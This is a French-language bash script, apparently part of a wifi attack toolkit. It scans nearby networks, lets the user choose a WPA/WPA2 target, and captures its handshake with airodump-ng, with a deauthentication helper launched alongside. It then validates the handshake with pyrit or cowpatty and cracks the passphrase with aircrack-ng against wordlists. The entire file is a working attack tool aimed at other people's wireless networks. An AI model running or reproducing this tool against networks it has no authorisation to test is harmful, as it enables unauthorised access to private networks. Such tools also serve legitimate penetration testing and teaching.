#! /bin/bash
WLANNM=$(cat /root/lscript/wlanmon.txt)
export WLANNM
#-----------------FONCTIONS-----------------
function defaults_lh1
{
#chemin pour lscript
	LPATH="/root/lscript"
	export LPATH
#chemin pour les raccourcis clavier
	KSPATH=""$LPATH"/ks"
	export KSPATH
#s'assurer que le kspath est défini
	if [[ ! -d "$KSPATH" ]]
	then
		mkdir "$KSPATH"
	fi
#PARAMÈTRES DE SUPPORT D'ALFA
	if [[ -f "$LPATH"/settings/AWUS036ACH.txt ]]
	then
		read ALFA < "$LPATH"/settings/AWUS036ACH.txt
	else
		ALFA="no"
	fi
#début Jaune 
	YS="\e[1;33m"
#début Bleu 
	BS="\e[0;34m"
#couleur de fin
	CE="\e[0m"
#début Rouge
	RS="\e[1;31m"
#début Noir
	BLS="\e[0;30m"
#début Gris Foncé
	DGYS="\e[1;30m"
#début Bleu Clair
	LBS="\e[1;34m"
#début Vert
	GNS="\e[0;32m"
#début Vert Clair
	LGNS="\e[1;32m"
#début Cyan
	CYS="\e[0;36m"
#début Cyan Clair
	LCYS="\e[1;36m"
#début Rouge Clair
	DRS="\e[0;31m"
#début Violet
	PS="\e[0;35m"
#début Violet Clair
	LPS="\e[1;35m"
#début Marron
	BRS="\e[0;33m"
#début Gris Clair
	LGYS="\e[0;37m"
#début Blanc
	WHS="\e[1;37m"
#définition d'une couleur personnalisée pour le logo
	if [[ -f "$LPATH"/settings/logocolor.txt ]]
	then
		read COL < "$LPATH"/settings/logocolor.txt
	else
		COL="$RS"
	fi
#réglage variables fréquentes
	YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Entrer"$CE"=yes)"
	YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Entrer"$CE"=no)"
	YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
	PAKT="Appuyez sur "$YS"une touche$CE pour"
	PAKTC="Appuyez sur "$YS"une touche$CE pour continuer..."
	PAKTGB="Appuyez sur "$YS"une touche$CE pour revenir en arrière..."
	TNI=""$RS"L'outil n'est pas installé. Pour l'installer, tapez '"$CE""$YS"install"$CE""$RS"'."$CE""
#code à lire depuis le clavier sans retour
	READAK="read -n 1"
#adresse MAC par défaut lors du démarrage du mode moniteur
	DEFMAC="00:11:22:33:44:55"
	
	wififb="wififb"
}
function dash_calc
{
	
	size=${#TERMINALTITLE}
	calc=$(( 65-size ))
	calc=$(( calc/2 ))
	numcalc=1
	DASHESN="-"
	while [ $numcalc != $calc ]
	do
		DASHESN=""$DASHESN"-"
		numcalc=$(( numcalc+1 ))
	done
	echo -e "$DASHESN"$RS"$TERMINALTITLE"$CE"$DASHESN"
}
function scan_networks
{
if [[ "$TARGB" = "" ]]
then
	pre_scan
else
	ap_sort_and_choose
	if [[ "$APCHOOSE" = "r" ]]
	then
		TARGB=""
		pre_scan
	elif [[ "$APCHOOSE" = "back" || "$APCHOOSE" = "b" ]]
	then
		break
	fi	
fi
}
function start_capture
{
export HANDF
if [[ "$HANDF" != "0" && "$HANDF" != "deauth" ]]
then
	if [[ -f "$HANDCAP" ]]
	then
		rm $HANDCAP
	fi
	gnome-terminal -q --geometry 70x10+0+0 -- lh2
	HANDFORDEAUTH="/root/handshakes/$HANDF-01.csv"
	export HANDFORDEAUTH
	airodump-ng --bssid $TARGB -c $TARGC -w /root/handshakes/$HANDF $WLANNM # & jobs -p > /root/lscript/dpidd.txt
	#~ airodump-ng --bssid $TARGB -c $TARGC -w /root/handshakes/$HANDF $WLANNM
	#kill le menu deauth en cours d'exécution
	if [[ -f "$LPATH"/dpid.txt ]]
	then
		read DPID < "$LPATH"/dpid.txt
		PIF=$(ps -A | grep "$DPID")
		if [[ "$PIF" != "" ]]
		then
			kill $DPID
		fi
	fi
	#kill l'autochecker pour handshake en cours d'exécution
	if [[ -f "$LPATH"/dpiddd.txt ]]
	then
		read DPID < "$LPATH"/dpiddd.txt
		PIF=$(ps -A | grep "$DPID")
		if [[ "$PIF" != "" ]]
		then
			kill $DPID
		fi
	fi
	if [[ -f "/root/lscript/dpid*.txt" ]]
	then
		rm /root/lscript/dpid*.txt
	fi
	validhandshake
	exec bash "$0"
else
	if [[ -f /root/handshakes/deauth-01.csv || -f /root/handshakes/deauth-01.cap || -f /root/handshakes/deauth-01.kismet.csv || -f /root/handshakes/deauth-01.kismet.netxml ]]
	then
		rm -f /root/handshakes/deauth-01.*
	fi
	HANDF="deauth"
	HANDFORDEAUTH="/root/handshakes/deauth-01.csv"
	gnome-terminal -q --geometry 70x10+0+0 -- lh2
	airodump-ng --bssid $TARGB -c $TARGC -w /root/handshakes/$HANDF $WLANNM
	if [[ -f "$LPATH"/dpid.txt ]]
	then
		read DPID < "$LPATH"/dpid.txt
		PIF=$(ps -A | grep "$DPID")
		if [[ "$PIF" != "" ]]
		then
			kill $DPID
		fi
	fi
	echo -e "Commencer la capture sur un fichier?"$YNYES""
	read SCF
	if [[ "$SCF" = "n" ]]
	then
		clear
		exec bash "$0"
	else
		while true
		do
			clear
			echo -e "Entrez le nom du fichier handshake (sans extension): "
			read -e HANDF
			if [[ ! -f "/root/handshakes/$HANDF-01.cap" ]]
			then
				break
			else
				echo -e ""$RS"Le fichier existe déjà."$CE""
				sleep 2
				continue
			fi
		done
		HANDFFP="/root/handshakes/$HANDF-01.cap"
		export HANDFFP
		if [[ -f "$HANDFFP" ]]
		then
			rm $HANDFFP
		fi
		gnome-terminal -q --geometry 70x10+0+0 -- lh2
		airodump-ng --bssid $TARGB -c $TARGC -w /root/handshakes/$HANDF $WLANNM
		if [[ -f "$LPATH"/dpid.txt ]]
		then
			read DPID < "$LPATH"/dpid.txt
			PIF=$(ps -A | grep "$DPID")
			if [[ "$PIF" != "" ]]
			then
				kill $DPID
			fi
		fi
		if [[ -f "/root/lscript/dpid*.txt" ]]
		then
			rm /root/lscript/dpid*.txt
		fi
		validhandshake
		exec bash "$0"
	fi
fi
}
function autoapselect
{
file="/root/lscript/tempairodump-01.csv"
if [[ -f "$file" ]]
then
	lines=$(cat $file | awk '/WPA|WPA2|OPN|WEP/ {print}' | awk 'END{print NR}')
	#add safety-lines
	lines=$((lines+10))
else
	lines=0
fi
n2=1
power=100
if [[ "$lines" != 0 ]]
then
	while [ $n2 -le "$lines" ]
	do
		n3=$((n2+2))
		##apower[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /WPA|WPA2/)print $8}') BEFORE UPDATE
		apower[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /WPA|WPA2/)print $9}')
		aopen[$n2]=0
		if [[ ${apower[$n2]} = "" ]]
		then
			aopen[$n2]=1
			apower[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /OPN|WEP/)print $9}')
		fi
		adata[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "} {if(NR==nn && /WPA|WPA2/)print $11}')
		if [[ ${adata[$n2]} = "" ]]
		then
			adata[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /OPN|WEP/)print $11}')
		fi
		#aessid[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "} {if(NR==nn && /WPA|WPA2/)print $19}') not working in latest 1.5.2 update
		aessid[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "} {if(NR==nn && /WPA|WPA2/)print $14}')
		if [[ ${aessid[$n2]} = "" ]]
		then
			aessid[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /OPN|WEP/)print $14}')
		fi
		achannel[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "} {if(NR==nn && /WPA|WPA2/)print $4}')
		if [[ ${achannel[$n2]} = "" ]]
		then
			achannel[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /OPN|WEP/)print $4}')
		fi
		amac[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "} {if(NR==nn && /WPA|WPA2/)print $1}')
		if [[ ${amac[$n2]} = "" ]]
		then
			amac[$n2]=$(cat $file | awk -v nn="$n3" '{FS=", "}{if(NR==nn && /OPN|WEP/)print $1}')
		fi
		powerunfixed="${apower[$n2]}"
		apowerfixed[$n2]="$powerunfixed"
		apowerfixed[$n2]=$((power+apowerfixed[$n2]))
		#echo ""$n2") "${apowerfixed[$n2]}"% "${amac[$n2]}" "${achannel[$n2]}" "${adata[$n2]}" "${aessid[$n2]}""
		###DEBUGGING
		#~ echo -e "n2="$n2" ${aessid[$n2]}"
		n2=$(( n2+1 ))
	done
	n3=1
	while [ $n3 -le "$lines" ]
	do
		n=1
		topsignal=100
		while [[ "$n" -le "$lines" ]]
		do
			if [[ "${apowerfixed[$n]}" -le "$topsignal" ]]
			then
				lowestn="$n"
				topsignal="${apowerfixed[$n]}"				
			fi
			n=$((n+1))
		done 
		zn[$n3]=$lowestn
		zopen[$n3]=${aopen[$lowestn]}
		zdata[$n3]=${adata[$lowestn]}
		zessid[$n3]=${aessid[$lowestn]}
		zpowerfixed[$n3]=${apowerfixed[$lowestn]}
		zmac[$n3]=${amac[$lowestn]}
		zchannel[$n3]=${achannel[$lowestn]}
		apowerfixed[$lowestn]=101
		n3=$((n3+1)) 
	done
	n3=1
	echo -e ""$BS" BLEU"$CE"=RÉSEAU OUVERT OU PROTÉGÉ PAR WEP"
	echo -e ""$YS"JAUNE"$CE"=RÉSEAU WPA/WPA2 AVEC DES CLIENTS ACTIFS"
	echo -e ""$RS"ROUGE"$CE"=RÉSEAU WPA/WPA2 SANS CLIENTS ACTIFS"
	echo -e "_________________________________________________________________________________________"
	echo -e "     POWER ESSID                                  MAC               CLIENTS  DATA"
	while [ $n3 -le "$lines" ]
	do
		#correction du bug \x00\x00\x00 dans airodump:
			checkbug=$(echo "${zessid[$n3]}" | grep "\x00")
			if [[ "$checkbug" == "" ]]
			then
				size="${#zessid[$n3]}"
			else
				zessidfixed=$(echo "${zessid[$n3]}" | cut -d '\' -f1)
				size="${#zessidfixed}"
			fi
		##
		
		##calculer le nombre de "_" nécessaires pour la sortie
		calc=$(( 40-size ))
		numcalc=1
		SPACES=""
		while [[ "$numcalc" != "$calc" ]]
		do
			SPACES=""$SPACES"_"
			numcalc=$(( numcalc+1 ))
		done
		if [[ "$n3" -le 9 ]]
		then
			num=" "$n3""
		else
			num=$n3
		fi
		size=${#zpowerfixed[$n3]}
		if [[ "$size" == 3 ]]
		then
			space=""
		elif [[ "$size" == 2 ]]
		then
			space=" "
		elif [[ "$size" == 1 ]]
		then
			space="  "
		fi
		DATAA=" "$RS"0"$CE""
		if [[ ${zpowerfixed[$n3]} -lt 100 ]]
		then
			size2=${#zessid[$n3]}
			if [[ "$size2" -eq 36 ]]
			then
				zessid[$n3]="____________________________________"
			fi
			START=""
			if [[ ${zopen[$n3]} = 1 ]]
			then
				START="$BS"
				if [[ ${zdata[$n3]} -gt 0 ]]
				then
					CLIENTS="YES"
					DATAA="${zdata[$n3]}"
				else
					CLIENTS="NO "
				fi
			else
				if [[ ${zdata[$n3]} -gt 0 ]]
				then
					CLIENTS="YES"
					START="$YS"
					DATAA="${zdata[$n3]}"
				else
					START="$RS"
					CLIENTS="NO "
				fi
			fi
			echo -e ""$YS""$num""$CE") "$START"${space}"${zpowerfixed[$n3]}"%   "${zessid[$n3]}""$SPACES""${zmac[$n3]}" "$CLIENTS"     "$DATAA""$CE""
		fi
		n3=$((n3+1))
	done
else
	echo -e ""$RS"Aucun réseau trouvé à proximité."$CE""
fi
echo -e ""$YS" r"$CE") rescan"
echo -e ""$YS" b"$CE") Go back"
echo -e "Choose: "
}
function capture_again
{
			echo -e "Capturez à nouveau le handshake contre le même réseau? "$YNYES""
			read CAGAIN
			if [[ ! "$CAGAIN" = "n" ]]
			then
				gnome-terminal -q --geometry 70x10+0+0 -- lh2
				airodump-ng --bssid $TARGB -c $TARGC -w /root/handshakes/$HANDF $WLANNM
				validhandshake
				exec bash "$0"
			fi
}
function ap_sort_and_choose
{
while true
do
	clear
	autoapselect
	read APCHOOSE
	clear
	if [[ "$APCHOOSE" = "back" || "$APCHOOSE" = "b" ]]
	then
		break
	elif [[ "$APCHOOSE" = "r" ]]
	then
		JC=0
		break
	elif [[ "$APCHOOSE" -le "$lines" && "$APCHOOSE" -ge 1 ]]
	then
		if [[ ${zopen[$APCHOOSE]} = 1 ]]
		then
			echo -e ""$RS"Vous avez sélectionné un réseau ouvert ou protégé par WEP. Veuillez sélectionner un réseau protégé par WPA/WPA2."$CE""
			echo -e "Press "$YS"enter"$CE" to go back"
			read
			break
		fi
		TARGB="${zmac[$APCHOOSE]}"
		TARGC="${zchannel[$APCHOOSE]}"
		TARGE="${zessid[$APCHOOSE]}"
		while true
		do
			clear
			echo -e "Entrez le nom du fichier handshake (sans extension)(e.g: "$YS"hand1"$CE")"
			echo -e "Tapez "$YS""0""$CE" pour aucun fichier"
			read -e HANDF
			if [[ "$HANDF" = 0 ]]
			then
				if [[ -f /root/handshakes/deauth-01.csv || -f /root/handshakes/deauth-01.cap || -f /root/handshakes/deauth-01.kismet.csv || -f /root/handshakes/deauth-01.kismet.netxml ]]
				then
					rm -f /root/handshakes/deauth-01.*
				fi
				HANDF="deauth"
				HANDFORDEAUTH="/root/handshakes/deauth-01.csv"
				break
			else
				if [[ ! -f "/root/handshakes/$HANDF-01.csv" ]]
				then
					HANDFORDEAUTH="/root/handshakes/$HANDF-01.csv"
					break
				else
					clear
					echo -e ""$RS"Le fichier existe déjà."$CE""
					sleep 2
					continue	
				fi				
			fi
		done
		HANDFFP="/root/handshakes/"$HANDF"-01.cap"
		HANDCAP="/root/handshakes/"$HANDF"-01.cap"
		export HANDFORDEAUTH
		export HANDCAP
		export HANDFFP
		export HANDF
		export TARGB
		export TARGC
		export TARGE
		clear
		start_capture
		break
	fi
done
}
function pre_scan
{
while true
do
	if [[ "$JC" != 1 ]]
	then
		remove_temps
		echo -e "Sélectionnez les éléments à scanner: "
		echo -e ""$YS"ENTRER"$CE") Toutes les channels"
		echo -e " "$YS"1"$CE"-"$YS"13"$CE") Channel spécifique"
		echo -e ""$YS"    b"$CE") Retour"
		read CHANNELSL
		if [[ "$CHANNELSL" = "" ]]
		then
			FJC=0
			JC=1
			airodump-ng $WLANNM -w /root/lscript/tempairodump
		elif [[ "$CHANNELSL" = "back" || "$CHANNELSL" = "b" ]]
		then
			clear
			CH="0"
			break
		else
			FJC=0
			JC=1
			airodump-ng -c $CHANNELSL $WLANNM -w /root/lscript/tempairodump
		fi
	fi
		ap_sort_and_choose
		if [[ "$APCHOOSE" = "r" ]]
		then
			JC=0
			continue
		elif [[ "$APCHOOSE" = "back" || "$APCHOOSE" = "b" ]]
		then
			break
		fi	
	done
}
function remove_temps
{
		rm -f /root/lscript/tempairodump*		
		rm -f /root/lscript/dpid*.txt
}
function validate_with_pyrit
{
	clear
	echo -e "Vérification du handshake avec pyrit..."
	TEMP=$(pyrit -r "$HANDCAP" analyze 2>/dev/null) 
	TEMPHAND=$(echo "$TEMP" | grep "No valid EAOPL-handshake + ESSID detected.")
	clear
	if [[ "$TEMPHAND" = "" ]]
	then
		VALIDH=1
		#TEMPHANDD=$(pyrit -r "$HANDCAP" analyze 2>/dev/null | grep "good")
		TEMPHANDD=$(echo "$TEMP" | grep "good")
		if [[ "$TEMPHANDD" = "" ]]
		then
			TEMPHAD=$(echo "$TEMP" | grep "workable")
			if [[ "$TEMPHAD" = "" ]]
			then	
				#TEMPHANDDD=$(pyrit -r "$HANDCAP" analyze 2>/dev/null | grep "bad")
				TEMPHANDDD=$(echo "$TEMP" | grep "bad")
				if [[ "TEMPHANDDD" = "" ]]
				then
					echo -e "Handshake trouvé!(Status: "$RS"inconnu"$CE")"
				else
					echo -e "Handshake trouvé!(Status: "$RS"mauvais"$CE")"
				fi
				echo -e ""
				echo -e "Voulez-vous le garder?"$YNNO": "
				read KORD
				if [[ "$KORD" = "y" ]]
				then
					VALIDH=1
				else
					VALIDH=0
				fi
				sleep 0.1
			else
				echo -e "Handshake trouvé!(Status: "$RS"suffisant"$CE")"
			fi			
		else
			echo -e "Handshake valide trouvé!(Status: "$YS"bon"$CE")"
			sleep 3
		fi
	else
		VALIDH=0
		echo -e ""$RS"Aucun handshake trouvé."$CE""
		sleep 2
	fi
}
function validate_with_cowpatty
{
	clear
	echo -e "Vérification du handshake avec cowpatty..."
	sleep 1
	TEMPHAND=$(cowpatty -c -r "$HANDCAP" | grep "Collected all necessary data to mount crack against WPA2/PSK passphrase.")
	clear
	if [[ "$TEMPHAND" = "" ]]
	then
		VALIDH=0
		echo -e ""$RS"Aucun handshake trouvé"$CE""
		sleep 1
		echo -e ""
		echo -e "Voulez-vous le vérifier avec pyrit? "$YNYES": "
		read CWP
		if [[ "$CWP" = "n" ]]
		then
			VALIDH=0
		else
			validate_with_pyrit
		fi
	else
		VALIDH=1
		echo -e ""$YS"Handshake valide trouvé!"$CE""
		sleep 2
	fi
}
function handshake_clean
{
	clear
	pyrit -r $HANDCAP -o /root/handshakes/"$HANDF"-cleaned.cap strip && echo -e "CLEANED"
	sleep 2
}
function validhandshake
{
echo -e "Avez-vous capturé le handshake?"$YNYES""
read HANDVALID
if [[ "$HANDVALID" = "n" ]]
then
	echo -e "Suppression du fichier..."
	sleep 2
	rm /root/handshakes/"$HANDF"-01*
	#~ remove_temps
	FJC=0
else
	FJC=1
	HANDCAP=/root/handshakes/"$HANDF"-01.cap
	validate_with_cowpatty
	if [[ "$VALIDH" = "0" ]]
	then
		FJC=0
		echo -e "Impossible de valider le handshake. Je le supprime? "$YNYES""
		read NOVALDEL
		if [[ ! "$NOVALDEL" = "n" ]]
		then
			rm /root/handshakes/"$HANDF"-01.*
			clear
			capture_again
		fi
	else
		clear
		echo -e "Voulez-vous nettoyer le handshake?"$YNYES""
		read HANDCC
		clear
		if [[ "$HANDCC" = "n" ]]
		then
			echo -e "Votre fichier de handshake est enregistré dans: /root/handshakes/"$HANDF"-01.cap"
			CTD="/root/handshakes/"$HANDF"-01.cap"
		else
			pyrit -r $HANDCAP -o /root/handshakes/"$HANDF"-cleaned.cap strip && echo -e "Le handshake a été clean! Vous pouvez le trouver dans: /root/handshakes/"$HANDF"-cleaned.cap"
			CTD="/root/handshakes/$HANDF-cleaned.cap"
		fi
		echo -e ""
		echo -e "Voulez-vous copier le fichier handshake sur le Bureau?"$YNYES""
		read CTDQ
		if [[ ! "$CTDQ" == "n" ]]
		then
			cp "$CTD" /root/Desktop
			echo -e ""$YS"Fait!"$CE""
			sleep 1
		fi
		echo -e "$PAKTC"
		$READAK
	fi
			
fi
clear
}
function capture_handshake
{
while true
do
	AA=-1
	clear
	echo -e ""$YS" 1"$CE") Utiliser la sélection: $TARGE"
	echo -e ""$YS" 2"$CE") Définir un autre BSSID et CHANNEL"
	echo -e ""$YS" r"$CE") Scanner à nouveau"
	echo -e ""$YS" b"$CE") Retour"
	echo -e "Choix: "
	read CAPTH
	if [[ "$CAPTH" = "back" || "$CAPTH" = "b" ]]
	then
		break
	elif [[ "$CAPTH" = "2" ]]
	then
		echo -e "Entrez le bssid de votre cible: "
		read -e TARGB
		echo -e "Entrez la channel de votre cible: "
		read -e TARGC
		echo -e "Entrez le nom du fichier handshake (sans extension): "
		echo -e "(n'utilisez pas le même nom deux fois)"
		echo -e "Tapez "$YS""0""$CE" pour aucun fichier"
		read -e HANDF
		TARGE=""
		HANDFFP="/root/handshakes/"$HANDF"-01.cap"
		HANDCAP="/root/handshakes/"$HANDF"-01.cap"
		export HANDCAP
		export HANDFFP
		export TARGB
		export TARGC
		export TARGE
		clear
		start_capture
		break
	elif [[ "$CAPTH" = "r" ]]
	then	
		scan_networks
		break
	elif [[ "$CAPTH" = "1" ]]
	then
		if [[ "$TARGE" = "" ]]
		then
			echo -e "Aucun réseau sélectionné. Lancez le scan et sélectionnez votre cible."
			sleep 4
			break
		else
			echo -e "Entrez le nom du fichier handshake (sans extension): "
			echo -e "(n'utilisez pas le même nom deux fois)"
			echo -e "Tapez "$YS""0""$CE" pour aucun fichier"
			read -e HANDF
			TARGE=""
			HANDFFP="/root/handshakes/"$HANDF"-01.cap"
			HANDCAP="/root/handshakes/"$HANDF"-01.cap"
			HANDFORDEAUTH="/root/handshakes/"$HANDF"-01.cap"
			export HANDCAP
			export HANDFFP
			clear
			start_capture
			break
		fi
	fi
done
}
function aircrack_handshakejust
{
	clear
	echo -e "Voulez-vous utiliser le fichier que vous venez de capturer?"$YNYES": "
	read -e YORN
	clear
	if [[ "$YORN" = "n" ]]
	then
		cd /root/handshakes
		ls | sort
		cd
		echo -e "Entrer le nom du handshake (sans extension)(dans le dossier /root/handshakes/): "
		read -e HANDFK
		HANDFFK="/root/handshakes/$HANDFK-01.cap"
		if [[ -f "$HANDFFK" ]]
		then
			echo -e "OK."
			HANDFFP="$HANDFFK"
			sleep 1
			clear
		else
			echo -e "Le fichier $HANDFK n'existe pas"
			sleep 2
			clear
			exec bash "$0"
		fi
		cd /root/wordlists
		ls | sort
		cd
		echo -e "Entrer le nom de la wordlist (avec extension)(dans le dossier /root/wordlists/): "
		read -e WORDF
		WORDFF="/root/wordlists/$WORDF"
		if [[ -f "$WORDFF" ]]
		then
			echo -e "OK."
			sleep 1
			clear
		else
			echo -e "Le fichier $WORDF n'existe pas"
			sleep 2
			clear
			exec bash "$0"
		fi
	else
		cd /root/wordlists
		ls | sort
		cd
		echo -e "Entrer le nom de la wordlist (avec extension)(dans le dossier /root/wordlists/): "
		read -e WORDF
		WORDFF="/root/wordlists/$WORDF"
		if [[ -f "$WORDFF" ]]
		then
			echo -e "OK."
			sleep 1
		else
			echo -e "Le fichier $WORDF n'existe pas"
			sleep 2
			clear
			exec bash "$0"
		fi
	fi
	clear
	aircrack-ng -w $WORDFF $HANDFFP
	echo -e "$PAKTGB"
	$READAK
}
function aircrack_handshake
{
	clear
	cd /root/handshakes
	ls | sort
	cd
	echo -e ""$YS" b"$CE") Go back"
	echo -e "Entrer le nom du handshake (avec extension)(dans le dossier /root/handshakes/): "
	read -e HANDFT
	if [[ "$HANDFT" = "back" || "$HANDFT" = "b" ]]
	then
		clear
		exec bash $0
	fi
	HANDFFT="/root/handshakes/$HANDFT"
	if [[ -f "$HANDFFT" ]]
	then
		echo -e "OK."
		sleep 1
		clear
	else
		echo -e ""$RS"Le fichier $HANDFT n'existe pas"$CE""
		sleep 2
		clear
		exec bash $0
	fi
	cd /root/wordlists
	ls | sort
	cd
	echo -e "Entrer le nom de la wordlist (avec extension)(dans le dossier /root/wordlists/): "
	read -e WORDF
	WORDFF="/root/wordlists/$WORDF"
	if [[ -f "$WORDFF" ]]
	then
		echo -e "OK."
		sleep 1
		clear
	else
		echo -e "Le fichier $WORDF n'existe pas"
		sleep 2
		clear
		continue
	fi

	clear
	aircrack-ng -w $WORDFF $HANDFFT
	echo -e "$PAKTGB"
	$READAK
}
function main_handshake_options
{
while true
do
clear

if [[ -f "/root/handshakes/*.csv" ]]
then
	rm /root/handshakes/*.csv
	rm /root/handshakes/*.netxml
fi
TERMINALTITLE="HANDSHAKE"
dash_calc
printf '\033]2;HANDSHAKE\a'
if [[ "$TARGE" = "" ]]
then
	echo -e ""$YS" 1"$CE") Analyser les réseaux à proximité     Sélectionné:"$RS"Aucun"$CE""
else
	echo -e ""$YS" 1"$CE") Analyser les réseaux à proximité     Sélectionné:"$YS""$TARGE""$CE""
fi
echo -e ""$YS" 2"$CE") Capturer un handshake"
echo -e ""$YS" 3"$CE") Aircrack le handshake"
echo -e ""$YS" 4"$CE") Vérifier un handshake"
echo -e ""$YS" 5"$CE") Clean un handshake"
echo -e ""$YS" 6"$CE") Supprimer les fichiers .csv & .netxml"
echo -e ""$YS" 0"$CE") Quitter"
echo -e "Choix: "
sleep 1
CH=0
read -e AA
clear
if [[ "$AA" = "1" ]]
then
	CH=1
	scan_networks
elif [[ "$AA" = "2" ]]
then
	capture_handshake
elif [[ "$AA" = "3" ]]
then
	if [[ "$FJC" = "1" ]]
	then
		AAGAIN=1
		aircrack_handshakejust
	else
		AAGAIN=2
		aircrack_handshake
	fi
elif [[ "$AA" = "4" ]]
then
	echo -e "------------------Vous êtes dans le dossier /root/handshakes--------------------"
	ls /root/handshakes
	echo -e "Tapez le nom du handshake que vous voulez vérifier:(e.g: "$YS"hand1-01"$CE")"
	echo -e ""$RS"Sans extention"$CE""
	read HANDF
	if [[ ! -f /root/handshakes/"$HANDF" ]]
	then
		if [[ -f /root/handshakes/"$HANDF".cap ]]
		then
			HANDCAP=/root/handshakes/"$HANDF".cap
		else
			if [[ -f /root/handshakes/"$HANDF"-01.cap ]]
			then
				HANDCAP=/root/handshakes/"$HANDF"-01.cap
			else
				echo -e "Handshake introuvable!"
				sleep 3
				continue
			fi
		fi
	else
		HANDCAP=/root/handshakes/"$HANDF"
	fi
	while true
	do
		clear
		echo -e ""$BS"Validez avec: "$CE""
		echo -e ""$YS" 1"$CE") Pyrit"
		echo -e ""$YS" 2"$CE") Cowpatty"
		echo -e "Choix: "
		read VLD
		if [[ "$VLD" = 1 ]]
		then
			validate_with_pyrit
			echo -e "$PAKTGB"
			$READAK
			break
		elif [[ "$VLD" = 2 ]]
		then
			validate_with_cowpatty
			echo -e "$PAKTGB"
			$READAK
			break
		elif [[ "$VLD" = "b" || "$VLD" = "back" || "$VLD" = 00 ]]
		then
			break
		fi
	done
elif [[ "$AA" = "5" ]]
then
	echo -e "------------------Vous êtes dans le dossier /root/handshakes--------------------"
	ls /root/handshakes
	echo -e "Tapez le nom du handshake que vous voulez clean:(e.g: "$YS"hand1-01"$CE")"
	echo -e ""$RS"Sans extention"$CE""
	read HANDF
	if [[ ! -f /root/handshakes/"$HANDF" ]]
	then
		if [[ -f /root/handshakes/"$HANDF".cap ]]
		then
			HANDCAP=/root/handshakes/"$HANDF".cap
		else
			if [[ -f /root/handshakes/"$HANDF"-01.cap ]]
			then
				HANDCAP=/root/handshakes/"$HANDF"-01.cap
			else
				echo -e "Handshake introuvable!"
				sleep 3
				continue
			fi
		fi
	else
		HANDCAP=/root/handshakes/"$HANDF"
	fi
	handshake_clean
elif [[ "$AA" = "6" ]]
then
	rm -f /root/handshakes/*.csv
	rm -f /root/handshakes/*.netxml
	sleep 0.2
	clear
	exec bash "$0"
elif [[ "$AA" = "0" ]]
then
	exit
else
	clear
	continue
fi
done	
}
#-------------------------------------------
defaults_lh1
main_handshake_options
